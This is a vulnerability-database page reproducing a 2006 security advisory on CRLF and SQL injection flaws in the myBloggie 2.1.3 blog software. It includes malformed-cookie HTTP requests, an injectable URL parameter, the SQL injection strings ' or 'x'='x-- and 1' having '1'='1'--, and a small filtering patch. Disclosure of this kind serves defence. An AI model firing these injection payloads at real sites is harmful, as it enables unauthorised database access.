Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

HYSA-2006-008.txt

🗓️ 22 May 2006 00:00:00Reported by matrix killerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

myBloggie 2.1.3 CRLF & SQL Injection, Medium severity, vendor unresponsiv

Show more
Code
`------------------------------------------------------  
HYSA-2006-008 h4cky0u.org Advisory 017  
------------------------------------------------------  
Date - Wed May 17 2006  
  
  
TITLE:  
======  
  
myBloggie 2.1.3 CRLF & SQL Injection   
  
  
SEVERITY:   
=========   
  
Medium   
  
  
SOFTWARE:   
=========   
  
myBloggie 2.1.3   
  
http://mybloggie.mywebland.com/   
  
  
INFO:   
=====   
  
myBloggie is considered one of the most simple, user-friendliest yet packed with features   
  
Weblog system available to date.   
  
  
DESCRIPTION:   
============   
  
--==CRLF injection==--   
  
GET /mybloggie/ HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q, or something like that   
Connection: Close   
  
GET /mybloggie/admin.php HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q, or something like that   
Connection: Close   
  
GET /mybloggie/index.php HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q, or something like that   
Connection: Close   
  
--==SQL injection==--   
  
http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id='   
  
Also MurderSkillz discovered a bug in the search function. Here is a proof-of-concept:   
  
1' having '1'='1'--   
  
or   
  
' or 'x'='x--   
  
And a little patch from me:   
  
if(ereg('[^A-Za-z0-9_]',$_POST['keyword'])){   
echo "Invalid Characters";   
exit;   
}   
  
if (isset($_GET['select'])) $select=$_GET['select'];   
if (isset($_POST['keyword'])) $keyword=$_POST['keyword'];   
  
  
$keyword = preg_replace($html_entities_match, $html_entities_replace,$keyword);   
//....   
  
  
VENDOR STATUS:   
==============   
  
Vendor was contacted but no response received till date.   
  
  
CREDITS:   
========   
  
This vulnerability was discovered and researched by   
matrix_killer of h4cky0u Security Forums.   
  
mail : matrix_k at abv.bg   
  
web : http://www.h4cky0u.org   
  
  
Search function sql injection was discovered by: MurderSkillz  
  
  
Co-Researcher:  
  
h4cky0u of h4cky0u Security Forums.   
  
mail : h4cky0u at gmail.com   
  
web : http://www.h4cky0u.org   
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
  
ORIGINAL ADVISORY:  
==================  
  
http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4
mybloggie 2.1.3crlf injectionsql injectionmedium severityvendor unresponsiveh4cky0u.org
25
.json
Report